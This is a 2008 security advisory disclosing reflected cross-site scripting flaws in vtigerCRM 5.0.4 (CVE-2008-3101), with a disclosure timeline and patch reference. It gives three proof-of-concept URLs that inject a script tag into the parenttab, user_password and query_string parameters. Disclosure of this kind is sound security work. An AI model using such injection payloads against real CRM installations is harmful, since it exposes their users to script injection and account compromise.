Cross Site Scripting (XSS) in vtigerCRM 5.0.4, CVE-2008-3101

Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3101
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3101
http://www.vtiger.de/

Description

vtigerCRM is a Open Source Customer Relationship Management (CRM) Software.
The application is vulnerable to simple Cross Site Scripting, which can be used for several isues

Example

Assuming vtigerCRM is installed on http://localhost/vtigercrm/, one can inject JavaScript with:

http://localhost/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>

http://localhost/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>

http://localhost/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>

...

Workaround/Fix

vtiger CRM Security Patch for 5.0.4

Disclosure Timeline

2008-07-28 Vendor contacted
2008-07-28 Vendor fixed issue in test environment
2008-07-30 Vender released patch
2008-07-30 Vendor dev statet they'll release a second patch within days
2008-09-01 published advisory, no second patch from upstream yet

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3101 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from seracom GmbH and Hanno Boeck).
It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-01, http://www.fabian-fingerle.de